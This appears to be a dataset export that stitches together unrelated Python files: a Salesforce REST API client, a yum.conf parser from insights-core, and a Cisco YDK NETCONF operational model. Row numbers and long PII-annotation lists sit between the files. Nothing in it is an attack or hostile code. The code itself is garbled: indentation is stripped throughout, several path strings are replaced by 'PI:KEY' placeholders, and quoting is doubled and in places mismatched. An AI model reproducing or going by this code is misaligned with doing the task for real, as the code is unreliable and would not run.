for easy use of the Salesforce REST API.
""""""
def __init__(
self, username=None, password=None, security_token=None,
session_id=None, instance=None, instance_url=None,
organizationId=None, sandbox=False, version=DEFAULT_API_VERSION,
proxies=None, session=None):
""""""Initialize the instance with the given parameters.
Available kwargs
Password Authentication:
* username -- the Salesforce username to use for authentication
* password -- the password for the username
* security_token -- the security token for the username
* sandbox -- True if you want to login to `test.salesforce.com`, False
if you want to login to `login.salesforce.com`.
Direct Session and Instance Access:
* session_id -- Access token for this session
Then either
* instance -- Domain of your Salesforce instance, i.e. `na1.salesforce.com`
OR
* instance_url -- Full URL of your instance i.e. `https://na1.salesforce.com`
Universal Kwargs:
* version -- the version of the Salesforce API to use, for example `29.0`
* proxies -- the optional map of scheme to proxy server
* session -- Custom requests session, created in calling code. This
enables the use of requets Session features not otherwise
exposed by simple_salesforce.
""""""
# Determine if the user passed in the optional version and/or sandbox kwargs
self.sf_version = version
self.sandbox = sandbox
self.proxies = proxies
# Determine if the user wants to use our username/password auth or pass in their own information
if all(arg is not None for arg in (username, password, security_token)):
self.auth_type = ""password""
# Pass along the username/password to our login helper
self.session_id, self.sf_instance = SalesforceLogin(
session=session,
username=username,
password=password,
security_token=security_token,
sandbox=self.sandbox,
sf_version=self.sf_version,
proxies=self.proxies)
elif all(arg is not None for arg in (session_id, instance or instance_url)):
self.auth_type = ""direct""
self.session_id = session_id
# If the user provides the full url (as returned by the OAuth interface for
# example) extract the hostname (which we rely on)
if instance_url is not None:
self.sf_instance = urlparse(instance_url).hostname
else:
self.sf_instance = instance
elif all(arg is not None for arg in (username, password, organizationId)):
self.auth_type = 'ipfilter'
# Pass along the username/password to our login helper
self.session_id, self.sf_instance = SalesforceLogin(
session=session,
username=username,
password=password,
organizationId=organizationId,
sandbox=self.sandbox,
sf_version=self.sf_version,
proxies=self.proxies)
else:
raise TypeError(
'You must provide login information or an instance and token'
)
if self.sandbox:
self.auth_site = 'https://test.salesforce.com'
else:
self.auth_site = 'https://login.salesforce.com'
self.request = session or requests.Session()
self.request.proxies = self.proxies
self.headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + self.session_id,
'X-PrettyPrint': '1'
}
self.base_url = ('https://{instance}/services/data/v{version}/'
.format(instance=self.sf_instance,
version=self.sf_version))
self.apex_url = ('https://{instance}/services/apexrest/'
.format(instance=self.sf_instance))
def describe(self):
url = self.base_url + ""sobjects""
result = self.request.get(url, headers=self.headers)
if result.status_code != 200:
raise SalesforceGeneralError(url,
'describe',
result.status_code,
result.content)
json_result = result.json(object_pairs_hook=OrderedDict)
if len(json_result) == 0:
return None
else:
return json_result
# SObject Handler
def __getattr__(self, name):
""""""Returns an `SFType` instance for the given Salesforce object type
(given in `name`).
The magic part of the SalesforceAPI, this function translates
calls such as `salesforce_api_instance.Lead.metadata()` into fully
constituted `SFType` instances to make a nice Python API wrapper
for the REST API.
Arguments:
* name -- the name of a Salesforce object type, e.g. Lead or Contact
""""""
# fix to enable serialization (https://github.com/heroku/simple-salesforce/issues/60)
if name.startswith('__'):
return super(Salesforce, self).__getattr__(name)
return SFType(name, self.session_id, self.sf_instance, self.sf_version, self.proxies)
# User utlity methods
def set_password(self, user, password):
""""""Sets the password of a user
salesforce dev documentation link:
https://www.salesforce.com/us/developer/docs/api_rest/Content/dome_sobject_user_password.htm
Arguments:
* user: the userID of the user to set
* password: the new password
""""""
url = self.base_url + 'sobjects/User/%s/password' % user
params = { 'NewPassword' : password, }
result = self.request.post(url, headers=self.headers, data=json.dumps(params))
# salesforce return 204 No Content when the request is successful
if result.status_code != 200 and result.status_code != 204:
raise SalesforceGeneralError(url,
'User',
result.status_code,
result.content)
json_result = result.json(object_pairs_hook=OrderedDict)
if len(json_result) == 0:
return None
else:
return json_result
def setPassword(self, user, password):
import warnings
warnings.warn(
""This method has been deprecated. Please use set_password instread."", DeprecationWarning)
return self.set_password(user, password)
# Generic Rest Function
def restful(self, path, params):
""""""Allows you to make a direct REST call if you know the path
Arguments:
* path: The path of the request
Example: sobjects/User/ABC123/password'
* params: dict of parameters to pass to the path
""""""
url = self.base_url + path
result = self.request.get(url, headers=self.headers, params=params)
if result.status_code != 200:
raise SalesforceGeneralError(url,
path,
result.status_code,
result.content)
json_result = result.json(object_pairs_hook=OrderedDict)
if len(json_result) == 0:
return None
else:
return json_result
# Search Functions
def search(self, search):
""""""Returns the result of a Salesforce search as a dict decoded from
the Salesforce response JSON payload.
Arguments:
* search -- the fully formatted SOSL search string, e.g.
`FIND {Waldo}`
""""""
url = self.base_url + 'search/'
# `requests` will correctly encode the query string passed as `params`
params = {'q': search}
result = self.request.get(url, headers=self.headers, params=params)
if result.status_code != 200:
raise SalesforceGeneralError(url,
'search',
result.status_code,
result.content)
json_result = result.json(object_pairs_hook=OrderedDict)
if len(json_result) == 0:
return None
else:
return json_result
def quick_search(self, search):
""""""Returns the result of a Salesforce search as a dict decoded from
the Salesforce response JSON payload.
Arguments:
* search -- the non-SOSL search string, e.g. `Waldo`. This search
string will be wrapped to read `FIND {Waldo}` before being
sent to Salesforce
""""""
search_string = u'FIND {{{search_string}}}'.format(search_string=search)
return self.search(search_string)
# Query Handler
def query(self, query, **kwargs):
""""""Return the result of a Salesforce SOQL query as a dict decoded from
the Salesforce response JSON payload.
Arguments:
* query -- the SOQL query to send to Salesforce, e.g.
`SELECT Id FROM Lead WHERE Email = dummy@email.com""`
""""""
url = self.base_url + 'query/'
params = {'q': query}
# `requests` will correctly encode the query string passed as `params`
result = self.request.get(url, headers=self.headers, params=params, **kwargs)
if result.status_code != 200:
_exception_handler(result)
return result.json(object_pairs_hook=OrderedDict)
def query_more(self, next_records_identifier, identifier_is_url=False, **kwargs):
""""""Retrieves more results from a query that returned more results
than the batch maximum. Returns a dict decoded from the Salesforce
response JSON payload.
Arguments:
* next_records_identifier -- either the Id of the next Salesforce
object in the result, or a URL to the
next record in the result.
* identifier_is_url -- True if `next_records_identifier` should be
treated as a URL, False if
`next_records_identifer` should be treated as
an Id.
""""""
if identifier_is_url:
# Don't use `self.base_url` here because the full URI is provided
url = (u'https://{instance}{next_record_url}'
.format(instance=self.sf_instance,
next_record_url=next_records_identifier))
else:
url = self.base_url + 'query/{next_record_id}'
url = url.format(next_record_id=next_records_identifier)
result = self.request.get(url, headers=self.headers, **kwargs)
if result.status_code != 200:
_exception_handler(result)
return result.json(object_pairs_hook=OrderedDict)
def query_all(self, query, **kwargs):
""""""Returns the full set of results for the `query`. This is a
convenience wrapper around `query(...)` and `query_more(...)`.
The returned dict is the decoded JSON payload from the final call to
Salesforce, but with the `totalSize` field representing the full
number of results retrieved and the `records` list representing the
full list of records retrieved.
Arguments
* query -- the SOQL query to send to Salesforce, e.g.
`SELECT Id FROM Lead WHERE Email = "dummy@email.com"`
"""
def get_all_results(previous_result, **kwargs):
""""""Inner function for recursing until there are no more results.
Returns the full set of results that will be the return value for
`query_all(...)`
Arguments:
* previous_result -- the modified result of previous calls to
Salesforce for this query
""""""
if previous_result['done']:
return previous_result
else:
result = self.query_more(previous_result['nextRecordsUrl'],
identifier_is_url=True, **kwargs)
result['totalSize'] += previous_result['totalSize']
# Include the new list of records with the previous list
previous_result['records'].extend(result['records'])
result['records'] = previous_result['records']
# Continue the recursion
return get_all_results(result, **kwargs)
# Make the initial query to Salesforce
result = self.query(query, **kwargs)
# The number of results might have exceeded the Salesforce batch limit
# so check whether there are more results and retrieve them if so.
return get_all_results(result, **kwargs)
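# Illustrative usage (a sketch): query_all transparently follows
# 'nextRecordsUrl' pages, so callers see one combined payload:
#   everything = sf.query_all("SELECT Id FROM Contact")
#   assert len(everything['records']) == everything['totalSize']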
def apexecute(self, action, method='GET', data=None, **kwargs):
""""""Makes an HTTP request to an APEX REST endpoint
Arguments:
* action -- The REST endpoint for the request.
* method -- HTTP method for the request (default GET)
* data -- A dict of parameters to send in a POST / PUT request
* kwargs -- Additional kwargs to pass to `requests.request`
""""""
result = self._call_salesforce(method, self.apex_url + action,
data=json.dumps(data), **kwargs)
if result.status_code == 200:
try:
response_content = result.json()
except Exception:
response_content = result.text
return response_content
def _call_salesforce(self, method, url, **kwargs):
""""""Utility method for performing HTTP call to Salesforce.
Returns a `requests.result` object.
""""""
result = self.request.request(method, url, headers=self.headers, **kwargs)
if result.status_code >= 300:
_exception_handler(result)
return result
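# Example usage (a sketch with placeholder credentials): password login plus
# a simple SOQL query through the wrapper above.
# sf = Salesforce(username='user@example.com', password='xxx',
#                 security_token='token')
# print(sf.query("SELECT Id, Email FROM Lead LIMIT 10")['totalSize'])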
class SFType(object):
""""""An interface to a specific type of SObject""""""
def __init__(self, object_name, session_id, sf_instance, sf_version='27.0', proxies=None):
""""""Initialize the instance with the given parameters.
Arguments:
* object_name -- the name of the type of SObject this represents,
e.g. `Lead` or `Contact`
* session_id -- the session ID for authenticating to Salesforce
* sf_instance -- the domain of the instance of Salesforce to use
* sf_version -- the version of the Salesforce API to use
* proxies -- the optional map of scheme to proxy server
""""""
self.session_id = session_id
self.name = object_name
self.request = requests.Session()
self.request.proxies = proxies
self.base_url = (u'https://{instance}/services/data/v{sf_version}/sobjects/{object_name}/'
.format(instance=sf_instance,
object_name=object_name,
sf_version=sf_version))
def metadata(self):
""""""Returns the result of a GET to `.../{object_name}/` as a dict
decoded from the JSON payload returned by Salesforce.
""""""
result = self._call_salesforce('GET', self.base_url)
return result.json(object_pairs_hook=OrderedDict)
def describe(self):
""""""Returns the result of a GET to `.../{object_name}/describe` as a
dict decoded from the JSON payload returned by Salesforce.
""""""
result = self._call_salesforce('GET', self.base_url + 'describe')
return result.json(object_pairs_hook=OrderedDict)
def describe_layout(self, record_id):
""""""Returns the result of a GET to `.../{object_name}/describe/layouts/` as a
dict decoded from the JSON payload returned by Salesforce.
""""""
result = self._call_salesforce('GET', self.base_url + 'describe/layouts/' + record_id)
return result.json(object_pairs_hook=OrderedDict)
def get(self, record_id):
""""""Returns the result of a GET to `.../{object_name}/{record_id}` as a
dict decoded from the JSON payload returned by Salesforce.
Arguments:
* record_id -- the Id of the SObject to get
""""""
result = self._call_salesforce('GET', self.base_url + record_id)
return result.json(object_pairs_hook=OrderedDict)
def get_by_custom_id(self, custom_id_field, custom_id):
""""""Returns the result of a GET to `.../{object_name}/{custom_id_field}/{custom_id}` as a
dict decoded from the JSON payload returned by Salesforce.
Arguments:
* custom_id_field -- the API name of a custom field that was defined as an External ID
* custom_id - the External ID value of the SObject to get
""""""
custom_url = self.base_url + '{custom_id_field}/{custom_id}'.format(
custom_id_field=custom_id_field, custom_id=custom_id)
result = self._call_salesforce('GET', custom_url)
return result.json(object_pairs_hook=OrderedDict)
def create(self, data):
""""""Creates a new SObject using a POST to `.../{object_name}/`.
Returns a dict decoded from the JSON payload returned by Salesforce.
Arguments:
* data -- a dict of the data to create the SObject from. It will be
JSON-encoded before being transmitted.
""""""
result = self._call_salesforce('POST', self.base_url,
data=json.dumps(data))
return result.json(object_pairs_hook=OrderedDict)
def upsert(self, record_id, data, raw_response=False):
""""""Creates or updates an SObject using a PATCH to
`.../{object_name}/{record_id}`.
If `raw_response` is false (the default), returns the status code
returned by Salesforce. Otherwise, return the `requests.Response`
object.
Arguments:
* record_id -- an identifier for the SObject as described in the
Salesforce documentation
* data -- a dict of the data to create or update the SObject from. It
will be JSON-encoded before being transmitted.
* raw_response -- a boolean indicating whether to return the response
directly, instead of the status code.
""""""
result = self._call_salesforce('PATCH', self.base_url + record_id,
data=json.dumps(data))
return self._raw_response(result, raw_response)
def update(self, record_id, data, raw_response=False):
""""""Updates an SObject using a PATCH to
`.../{object_name}/{record_id}`.
If `raw_response` is false (the default), returns the status code
returned by Salesforce. Otherwise, return the `requests.Response`
object.
Arguments:
* record_id -- the Id of the SObject to update
* data -- a dict of the data to update the SObject from. It will be
JSON-encoded before being transmitted.
* raw_response -- a boolean indicating whether to return the response
directly, instead of the status code.
""""""
result = self._call_salesforce('PATCH', self.base_url + record_id,
data=json.dumps(data))
return self._raw_response(result, raw_response)
def delete(self, record_id, raw_response=False):
""""""Deletes an SObject using a DELETE to
`.../{object_name}/{record_id}`.
If `raw_response` is false (the default), returns the status code
returned by Salesforce. Otherwise, return the `requests.Response`
object.
Arguments:
* record_id -- the Id of the SObject to delete
* raw_response -- a boolean indicating whether to return the response
directly, instead of the status code.
""""""
result = self._call_salesforce('DELETE', self.base_url + record_id)
return self._raw_response(result, raw_response)
def deleted(self, start, end):
""""""Use the SObject Get Deleted resource to get a list of deleted records for the specified object.
.../deleted/?start=2013-05-05T00:00:00+00:00&end=2013-05-10T00:00:00+00:00
* start -- start datetime object
* end -- end datetime object
""""""
url = self.base_url + 'deleted/?start={start}&end={end}'.format(
start=date_to_iso8601(start), end=date_to_iso8601(end))
result = self._call_salesforce('GET', url)
return result.json(object_pairs_hook=OrderedDict)
def updated(self, start, end):
""""""Use the SObject Get Updated resource to get a list of updated (modified or added)
records for the specified object.
.../updated/?start=2014-03-20T00:00:00+00:00&end=2014-03-22T00:00:00+00:00
* start -- start datetime object
* end -- end datetime object
""""""
url = self.base_url + 'updated/?start={start}&end={end}'.format(
start=date_to_iso8601(start), end=date_to_iso8601(end))
result = self._call_salesforce('GET', url)
return result.json(object_pairs_hook=OrderedDict)
def _call_salesforce(self, method, url, **kwargs):
""""""Utility method for performing HTTP call to Salesforce.
Returns a `requests.result` object.
""""""
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + self.session_id,
'X-PrettyPrint': '1'
}
result = self.request.request(method, url, headers=headers, **kwargs)
if result.status_code >= 300:
_exception_handler(result, self.name)
return result
def _raw_response(self, response, body_flag):
""""""Utility method for processing the response and returning either the
status code or the response object.
Returns either an `int` or a `requests.Response` object.
""""""
if not body_flag:
return response.status_code
else:
return response
class SalesforceAPI(Salesforce):
""""""Depreciated SalesforceAPI Instance
This class implements the Username/Password Authentication Mechanism using Arguments
It has since been surpassed by the 'Salesforce' class, which relies on kwargs
""""""
def __init__(self, username, password, security_token, sandbox=False,
sf_version='27.0'):
""""""Initialize the instance with the given parameters.
Arguments:
* username -- the Salesforce username to use for authentication
* password -- the password for the username
* security_token -- the security token for the username
* sandbox -- True if you want to login to `test.salesforce.com`, False
if you want to login to `login.salesforce.com`.
* sf_version -- the version of the Salesforce API to use, for example
""27.0""
""""""
import warnings
warnings.warn(
""Use of login arguments has been depreciated. Please use kwargs"",
DeprecationWarning
)
super(SalesforceAPI, self).__init__(username=username,
password=password,
security_token=security_token,
sandbox=sandbox,
version=sf_version)
def _exception_handler(result, name=""""):
""""""Exception router. Determines which error to raise for bad results""""""
try:
response_content = result.json()
except Exception:
response_content = result.text
exc_map = {
300: SalesforceMoreThanOneRecord,
400: SalesforceMalformedRequest,
401: SalesforceExpiredSession,
403: SalesforceRefusedRequest,
404: SalesforceResourceNotFound,
}
exc_cls = exc_map.get(result.status_code, SalesforceGeneralError)
raise exc_cls(result.url, result.status_code, name, response_content)
class SalesforceMoreThanOneRecord(SalesforceError):
""""""
Error Code: 300
The value returned when an external ID exists in more than one record. The
response body contains the list of matching records.
""""""
message = u""More than one record for {url}. Response content: {content}""
class SalesforceMalformedRequest(SalesforceError):
""""""
Error Code: 400
The request couldn't be understood, usually becaue the JSON or XML body contains an error.
""""""
message = u""Malformed request {url}. Response content: {content}""
class SalesforceExpiredSession(SalesforceError):
""""""
Error Code: 401
The session ID or OAuth token used has expired or is invalid. The response
body contains the message and errorCode.
""""""
message = u""Expired session for {url}. Response content: {content}""
class SalesforceRefusedRequest(SalesforceError):
""""""
Error Code: 403
The request has been refused. Verify that the logged-in user has
appropriate permissions.
""""""
message = u""Request refused for {url}. Response content: {content}""
class SalesforceResourceNotFound(SalesforceError):
""""""
Error Code: 404
The requested resource couldn't be found. Check the URI for errors, and
verify that there are no sharing issues.
""""""
message = u'Resource {name} Not Found. Response content: {content}'
def __str__(self):
return self.message.format(name=self.resource_name,
content=self.content)
class SalesforceGeneralError(SalesforceError):
""""""
A non-specific Salesforce error.
""""""
message = u'Error Code {status}. Response content: {content}'
def __str__(self):
return self.message.format(status=self.status, content=self.content)
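# Illustrative sketch: _exception_handler maps HTTP status codes to the
# exception classes above, so callers can catch a specific failure mode.
# The record Id is a placeholder.
# try:
#     sf.Contact.get('003000000000000')
# except SalesforceResourceNotFound as exc:
#     print(exc)
# except SalesforceGeneralError as exc:
#     print(exc)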
",27053,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'https://na1.salesforce.com'], ['URL', 'https://www.salesforce.com/us/developer/docs/api_rest/Content/dome_sobject_user_password.htm'], ['DATE_TIME', ""'29.0'""], ['URL', 'urllib.pa'], ['NRP', 'OrderedDict'], ['PERSON', 'ordereddict import'], ['PERSON', 'OrderedDict'], ['LOCATION', 'security_token'], ['PERSON', 'simple_salesforce'], ['LOCATION', 'security_token'], ['LOCATION', 'security_token'], ['URL', 'self.au'], ['PERSON', 'self.sf_instance ='], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.request.ge'], ['URL', 'result.st'], ['URL', 'result.st'], ['PERSON', 'json_result = result.json(object_pairs_hook=OrderedDict'], ['LOCATION', 'SalesforceAPI'], ['PERSON', 'name.startswith'], ['LOCATION', 'self.sf_instance'], ['URL', 'self.ba'], ['URL', 'self.re'], ['URL', 'result.st'], ['PERSON', 'json_result = result.json(object_pairs_hook=OrderedDict'], ['URL', 'self.ba'], ['URL', 'self.request.ge'], ['URL', 'result.st'], ['PERSON', 'json_result = result.json(object_pairs_hook=OrderedDict'], ['URL', 'self.ba'], ['URL', 'self.request.ge'], ['URL', 'result.st'], ['PERSON', 'json_result = result.json(object_pairs_hook=OrderedDict'], ['PERSON', 'Waldo'], ['NRP', 'SOQL'], ['URL', 'self.ba'], ['URL', 'self.request.ge'], ['PERSON', 'exception_handler(result'], ['NRP', 'query_more(self'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'url.fo'], ['URL', 'self.request.ge'], ['PERSON', 'exception_handler(result'], ['NRP', 'SOQL'], ['NRP', 'previous_result'], ['PERSON', 'exception_handler(result'], ['LOCATION', 'session_id'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['LOCATION', 'custom_id_field'], ['PERSON', 'custom_id_field'], ['URL', 'self.ba'], ['LOCATION', 'custom_id_field'], ['LOCATION', 'custom_id_field'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['PERSON', 'exception_handler(result'], ['LOCATION', 'security_token'], ['LOCATION', 'security_token'], ['LOCATION', 'security_token'], ['LOCATION', 'security_token'], ['PERSON', 'exception_handler(result'], ['LOCATION', 'SalesforceResourceNotFound'], ['URL', 'result.st'], ['URL', 'https://test.salesforce.com'], ['URL', 'https://login.salesforce.com'], ['URL', 'https://github.com/heroku/simple-salesforce/issues/60'], ['URL', 'test.salesforce.com'], ['URL', 'login.salesforce.com'], ['URL', 'na1.salesforce.com'], ['URL', 'self.sa'], ['URL', 'self.pro'], ['URL', 'self.au'], ['URL', 'self.se'], ['URL', 'self.sa'], ['URL', 'self.pro'], ['URL', 'self.se'], ['URL', 'self.au'], ['URL', 'self.se'], ['URL', 'self.sa'], ['URL', 'self.pro'], ['URL', 'self.sa'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.re'], ['URL', 'requests.Se'], ['URL', 'self.request.pro'], ['URL', 'self.pro'], ['URL', 'self.se'], ['URL', 'result.co'], ['URL', 'instance.Lead.me'], ['URL', 'name.st'], ['URL', 'self.se'], ['URL', 'self.pro'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'result.co'], ['URL', 'self.se'], ['URL', 'result.st'], ['URL', 'result.co'], ['URL', 'result.st'], ['URL', 'result.co'], ['URL', 'self.se'], ['URL', 'email.com'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'email.com'], ['URL', 'requests.re'], ['URL', 'result.st'], ['URL', 'requests.re'], ['URL', 'self.request.re'], ['URL', 'result.st'], ['URL', 'self.se'], ['URL', 'self.na'], ['URL', 'self.re'], ['URL', 'requests.Se'], ['URL', 'self.request.pro'], ['URL', 
'requests.Re'], ['URL', 'requests.Re'], ['URL', 'requests.Re'], ['URL', 'requests.re'], ['URL', 'self.se'], ['URL', 'self.request.re'], ['URL', 'result.st'], ['URL', 'self.na'], ['URL', 'requests.Re'], ['URL', 'response.st'], ['URL', 'test.salesforce.com'], ['URL', 'login.salesforce.com'], ['URL', 'map.ge'], ['URL', 'result.st'], ['URL', 'self.message.fo'], ['URL', 'self.re'], ['URL', 'self.co'], ['URL', 'self.message.fo'], ['URL', 'self.st'], ['URL', 'self.co']]"
102,"""""""
YumConf - file ``/etc/yum.conf``
================================
This module provides parsing for the ``/etc/yum.conf`` file.
The ``YumConf`` class parses the information in the file
``/etc/yum.conf``. See the ``IniConfigFile`` class for more
information on attributes and methods.
Sample input data looks like::
[main]
cachedir=/var/cache/yum/$basearch/$releasever
keepcache=0
debuglevel=2
logfile=/var/log/yum.log
exactarch=1
obsoletes=1
gpgcheck=1
plugins=1
installonly_limit=3
[rhel-7-server-rpms]
metadata_expire = 86400
baseurl = https://cdn.redhat.com/content/rhel/server/7/$basearch
name = Red Hat Enterprise Linux 7 Server (RPMs)
gpgkey = PI:KEY
enabled = 1
gpgcheck = 1
Examples:
>>> yconf = shared[YumConf]
>>> yconf.defaults()
{'admin_token': 'ADMIN', 'compute_port': '8774'}
>>> 'main' in yconf
True
>>> 'rhel-7-server-rpms' in yconf
True
>>> yconf.has_option('main', 'gpgcheck')
True
>>> yconf.has_option('main', 'foo')
False
>>> yconf.get('rhel-7-server-rpms', 'enabled')
'1'
>>> yconf.items('main')
{'plugins': '1',
'keepcache': '0',
'cachedir': '/var/cache/yum/$basearch/$releasever',
'exactarch': '1',
'obsoletes': '1',
'installonly_limit': '3',
'debuglevel': '2',
'gpgcheck': '1',
'logfile': '/var/log/yum.log'}
""""""
from insights.contrib.ConfigParser import NoOptionError
from .. import parser, IniConfigFile
from insights.specs import yum_conf
@parser(yum_conf)
class YumConf(IniConfigFile):
""""""Parse contents of file ``/etc/yum.conf``.""""""
def parse_content(self, content):
super(YumConf, self).parse_content(content)
# File /etc/yum.conf may contain repos definitions.
# Keywords 'gpgkey' and 'baseurl' might contain multiple
# values separated by comma. Convert those values into a list.
for section in self.sections():
for key in ('gpgkey', 'baseurl'):
try:
value = self.get(section, key)
if value and isinstance(value, str):
self.data.set(section, key, value.split(','))
except NoOptionError:
pass
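# A minimal usage sketch (editor's illustration, not part of the original
# module). It assumes the standard insights-core Parser(context) construction
# and the insights.core.context.Context import; the repo id and URLs are
# invented. It exercises the comma-splitting done in parse_content() above.
def _example_yumconf_baseurl():
    from insights.core.context import Context
    content = [
        '[rhel-7-server-rpms]',
        'baseurl = https://cdn.example.com/a,https://cdn.example.com/b',
    ]
    yconf = YumConf(Context(content=content, path='/etc/yum.conf'))
    # parse_content() converted the comma-separated value into a list
    return yconf.get('rhel-7-server-rpms', 'baseurl')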
",2282,"[['URL', 'https://cdn.redhat.com/content/rhel/server/7/$basearch'], ['PERSON', 'YumConf'], ['PERSON', 'admin_token'], ['PERSON', 'keepcache'], ['PERSON', 'exactarch'], ['PERSON', 'obsoletes'], ['LOCATION', 'insights.contrib'], ['PERSON', 'Parse'], ['IP_ADDRESS', 'e::\n\n '], ['URL', 'yum.co'], ['URL', 'yum.co'], ['URL', 'yum.co'], ['URL', 'yconf.de'], ['URL', 'yconf.ge'], ['URL', 'yconf.it'], ['URL', 'insights.contrib.Co'], ['URL', 'yum.co'], ['URL', 'yum.co'], ['URL', 'self.se'], ['URL', 'self.ge'], ['URL', 'self.data.se']]"
103,""""""" Cisco_IOS_XR_man_xml_ttyagent_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR man\-xml\-ttyagent package operational data.
This module contains definitions
for the following management objects\:
netconf\: NETCONF operational information
xr\-xml\: xr xml
Copyright (c) 2013\-2016 by Cisco Systems, Inc.
All rights reserved.
""""""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
class XrXmlSessionAlarmRegisterEnum(Enum):
""""""
XrXmlSessionAlarmRegisterEnum
AlarmNotify
.. data:: registered = 1
Registered
.. data:: not_registered = 2
NotRegistered
""""""
registered = 1
not_registered = 2
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXmlSessionAlarmRegisterEnum']
class XrXmlSessionStateEnum(Enum):
""""""
XrXmlSessionStateEnum
SessionState
.. data:: idle = 1
Idle
.. data:: busy = 2
Busy
""""""
idle = 1
busy = 2
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXmlSessionStateEnum']
class Netconf(object):
""""""
NETCONF operational information
.. attribute:: agent
NETCONF agent operational information
**type**\: :py:class:`Agent `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.agent = Netconf.Agent()
self.agent.parent = self
class Agent(object):
""""""
NETCONF agent operational information
.. attribute:: tty
NETCONF agent over TTY
**type**\: :py:class:`Tty `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.tty = Netconf.Agent.Tty()
self.tty.parent = self
class Tty(object):
""""""
NETCONF agent over TTY
.. attribute:: sessions
Session information
**type**\: :py:class:`Sessions `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.sessions = Netconf.Agent.Tty.Sessions()
self.sessions.parent = self
class Sessions(object):
""""""
Session information
.. attribute:: session
Session information
**type**\: list of :py:class:`Session `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.session = YList()
self.session.parent = self
self.session.name = 'session'
class Session(object):
""""""
Session information
.. attribute:: session_id
Session ID
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: admin_config_session_id
Admin config session ID
**type**\: str
.. attribute:: alarm_notification
is the session registered for alarm notifications
**type**\: :py:class:`XrXmlSessionAlarmRegisterEnum `
.. attribute:: client_address
ip address of the client
**type**\: str
.. attribute:: client_port
client's port
**type**\: int
**range:** 0..4294967295
.. attribute:: config_session_id
Config session ID
**type**\: str
.. attribute:: elapsed_time
Elapsed time(seconds) since a session is created
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: last_state_change
Time(seconds) since last session state change happened
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: start_time
session start time in seconds since the Unix Epoch
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: state
state of the session idle/busy
**type**\: :py:class:`XrXmlSessionStateEnum `
.. attribute:: username
Username
**type**\: str
.. attribute:: vrf_name
VRF name
**type**\: str
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.session_id = None
self.admin_config_session_id = None
self.alarm_notification = None
self.client_address = None
self.client_port = None
self.config_session_id = None
self.elapsed_time = None
self.last_state_change = None
self.start_time = None
self.state = None
self.username = None
self.vrf_name = None
@property
def _common_path(self):
if self.session_id is None:
raise YPYModelError('Key property session_id is None')
return 'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = ' + str(self.session_id) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.session_id is not None:
return True
if self.admin_config_session_id is not None:
return True
if self.alarm_notification is not None:
return True
if self.client_address is not None:
return True
if self.client_port is not None:
return True
if self.config_session_id is not None:
return True
if self.elapsed_time is not None:
return True
if self.last_state_change is not None:
return True
if self.start_time is not None:
return True
if self.state is not None:
return True
if self.username is not None:
return True
if self.vrf_name is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['Netconf.Agent.Tty.Sessions.Session']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.session is not None:
for child_ref in self.session:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['Netconf.Agent.Tty.Sessions']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.sessions is not None and self.sessions._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['Netconf.Agent.Tty']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.tty is not None and self.tty._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['Netconf.Agent']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-man-xml-ttyagent-oper:netconf'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.agent is not None and self.agent._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
